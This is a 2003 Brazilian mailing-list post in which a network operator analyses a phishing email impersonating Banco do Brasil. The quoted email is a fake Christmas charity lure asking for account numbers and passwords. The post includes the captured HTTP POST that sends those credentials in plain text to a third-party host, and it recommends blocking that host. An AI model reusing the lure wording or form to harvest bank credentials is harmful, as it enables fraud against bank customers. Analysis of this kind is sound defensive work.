[GTER] Esse esta' quase perfeito : [Fwd: {Spam?} Natal Banco do Brasil.]
Marcio Gomes
mpglista at microlink.com.br
Thu Dec 11 23:23:37 -02 2003
Pessoal,
Existe alguem do BB na lista ?
Essa mensagem demonstra um certo "refino" na tecnica de "engenharia
social" .
Verifiquem que o codigo html nao e' visivel e nao consegui com uma
rapida verificacao
identificar o destino do post p/ bloqueio.
Quando se da' submit no form do email, o seguinte trafego estranho e'
gerado :
23:01:53.286227 209.10.239.151.80 > XXX.YYY.ZZZ.WWW.55269: P
113:482(369) ack 695 win 64841 <nop,nop,timestamp 34485484 191277929> (DF)
23:01:53.286284 XXX.YYY.ZZZ.WWW.55269 > 209.10.239.151.80: . ack 482 win
6432 <nop,nop,timestamp 191277950 34485484> (DF)
Apos uma verificacao no que foi enviado :
POST /images/login.asp HTTP/1.1
Host: www.hcdonline.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2)
Gecko/20030208 Netscape/7.02
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us, en;q=0.50
Accept-Encoding: gzip, deflate, compress;q=0.9
Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Connection: keep-alive
Cookie: ASPSESSIONIDCSTACTDT=HDNHKMDDLEPPGKJOGKOHDILM
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Valor+a+ser+doado.=01&agencia=&conta=&senha=&senhacc=&botaoEntra.x=-58&botaoEntra.y=-61POST
/images/login.asp HTTP/1.1
Host: www.hcdonline.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2)
Gecko/20030208 Netscape/7.02
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us, en;q=0.50
Accept-Encoding: gzip, deflate, compress;q=0.9
Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Connection: keep-alive
Cookie: ASPSESSIONIDCSTACTDT=HDNHKMDDLEPPGKJOGKOHDILM
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Valor+a+ser+doado.=01&agencia=123456&conta=7890000&senha=00000000&senhacc=111111&botaoEntra.x=29&botaoEntra.y=16
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Como podem ver a senha, e dados da agencia e' passado em arquivo plano
p/ o host www.hcdonline.com
www.hcdonline.com has address 209.10.239.151
Dessa forma sugiro o bloqueio imediato ao ip 209.10.239.151, bem como a
www.hcdonline.com
Entretanto ficou a duvida de como foi implementado o codigo html ( nao
sou um expert em java e outros ) ja' que nao consigo ver nada
na mensagem e muito menos o post p/ /images/login.asp HTTP/1.1.
Infelizmente estou atarefado, mas diante de uma situacao um
pouco diferente das que estamos acostumados, achei interessante postar o
quanto antes.
Apos o submit e' aberta a pagina real do BB.. em https.
[]s
Marcio Gomes
Received: from cliente (MG149131120.user.veloxzone.com.br
[200.149.131.120] (may be forged)) XXXXXXXXXXXXXXXXXXX with SMTP id
hBBKxnh01101; Thu, 11 Dec 2003 18:59:53 -0200
Message-Id: <200312112059.hBBKxnh01101 at gavea-eth0.pop-rio.com.br>
From: "bb" <bb at bancobrasil.com.br>
To: "marcos1" <marcos1 at microlink.com.br>
Subject: {Spam?} Natal Banco do Brasil.
Date: Thu, 11 Dec 03 18:26:04 Hor. de verão leste da Am. Sul
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary=
"----=_NextPart_000_0090_D5D815D0.E2CF3A9C"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
X-MailScanner-Information: Please contact the ISP for more information
X-MailScanner: Found to be clean
X-MailScanner-SpamCheck: spam, SpamAssassin (score=7, required 5,
BASE64_ENC_TEXT, BAYES_60, FORGED_MUA_OUTLOOK, HTML_EVENT_UNSAFE,
HTML_JAVASCRIPT, HTML_TAG_BALANCE_TABLE, HTML_WIN_FOCUS, INVALID_DATE,
MIME_BOUND_NEXTPART, MIME_HTML_ONLY)
X-MailScanner-SpamScore: sssssss
Voltar página inicial <http://www.bb.com.br/appbb/portal/fz/index.jsp>
Voltar página inicial
<http://www.bb.com.br/appbb/portal/fz/index.jsp>null
<http://www.cidadania-e.com.br/>
Caro cliente BANCO DO BRASIL,
O Banco do Brasil em parceria com o Governo federal da a
oportunidade de seus clientes ajudarem o programa natal sem fome sem
precisar desembolsar nada para isso o cliente só precisa se cadastrar
para ajudar.
Para cada cliente cadastrado o banco vai doar alimentos,roupas e
brinquedos para pessoas carentes, não deixe de se cadastrar e fazer o
natal de milhares de pessoas mais feliz!!!
Para se "cadastrar", basta informar os dados de sua conta
corrente em nosso formulário ao lado, que é dotado de segurança de alto
nível a qual garante que seus dados vão ser codificados para que só a
tecnologia de nosso sistema possa ter acesso.
O BRASIL QUE COME AJUDANDO O BRASIL QUE TEM FOME.
www.fomezero.gov.br <http://www.fomezero.gov.br/>
Titular
Agência
Conta
Senha Eletrônica
Senha do Cartão
Banco do Brasil preocupado com seus clientes, preocupado em fazer amigos.
Banco do Brasil Empresa parceira do Fome Zero.
Relatório Anual <http://www.bb.com.br/appbb/portal/ra/index.jsp>Voltar
página inicial <http://www.bb.com.br/appbb/portal/fz/index.jsp>
. política de privacidade
<http://www.bb.com.br/appbb/portal/bb/pp/index.jsp> . internet grátis
<http://www.bb.com.br/appbb/portal/cm/intg/index.jsp> .
More information about the gter
mailing list